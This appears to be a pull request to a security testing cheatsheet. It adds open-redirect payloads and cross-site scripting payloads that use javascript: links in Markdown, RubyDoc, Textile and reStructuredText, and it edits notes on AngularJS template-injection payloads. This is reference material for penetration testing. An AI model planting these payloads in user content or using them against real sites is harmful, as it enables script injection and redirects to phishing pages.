### PR TITLE
[XSS] Add LML and Markdown XSS payloads

### DIFF
--- a/cheatsheets/open-redirect.md
+++ b/cheatsheets/open-redirect.md
@@ -15,3 +15,11 @@
 ```
 //www.google.com/%2e%2e
 ```
+
+```
+//google.com/
+```
+
+```
+//google.com/%2f..
+```

--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@@ -102,13 +102,13 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 XSS[JavaScript:alert(1)]
 ```
 
-**Textile** (.textile)
+**Textile** ([.textile](https://txstyle.org/))
 
 ```textile
 "Test link":javascript:alert(1)
 ```
 
-**reStructuredText** (.rst)
+**reStructuredText** ([.rst](http://docutils.sourceforge.net/docs/user/rst/quickref.html))
 
 ```rst
 `Test link`__.
@@ -118,7 +118,7 @@ __ javascript:alert(document.domain)
 
 **AngularJS Template Injection based XSS**
 
-*For quick manual testing, run `angular.version` in your browser console to check a live target*
+*For manual verification on a live target, use `angular.version` in your browser console*
 
 **1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
 

--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@@ -79,7 +79,41 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 **Markdown XSS**
 
 ```md
+[a](javascript:confirm(1)
+```
+
+```md
 [a](javascript://www.google.com%0Aprompt(1))
+```
+
+```md
+[a](javascript://%0d%0aconfirm(1);com)
+```
+
+```md
+[a](javascript:window.onerror=confirm;throw%201)
+```
+
+**Lightweight Markup Languages**
+
+**RubyDoc** (.rdoc)
+
+```rdoc
+XSS[JavaScript:alert(1)]
+```
+
+**Textile** (.textile)
+
+```textile
+"Test link":javascript:alert(1)
+```
+
+**reStructuredText** (.rst)
+
+```rst
+`Test link`__.
+
+__ javascript:alert(document.domain)  
 ```
 
 **AngularJS Template Injection based XSS**

--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@@ -118,6 +118,8 @@ __ javascript:alert(document.domain)
 
 **AngularJS Template Injection based XSS**
 
+*For quick manual testing, run `angular.version` in your browser console to check a live target*
+
 **1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
 
 ```js
@@ -239,7 +241,7 @@ __ javascript:alert(document.domain)
 }}
 ```
 
-**1.6.0+** (no Sandbox) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
+**1.6.0+** (no [Expression Sandbox](http://angularjs.blogspot.co.uk/2016/09/angular-16-expression-sandbox-removal.html)) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
 
 ```js
 {{constructor.constructor('alert(1)')()}}


### PR DESCRIPTION
Apologies for the separate PRs – completely forgot about manual branch creation. Added some extra Markdown payloads, along with a few for lightweight markup parsers (RubyDoc, Textile and RST).

*Edit: also included some open redirect payloads and other additions* 🙂 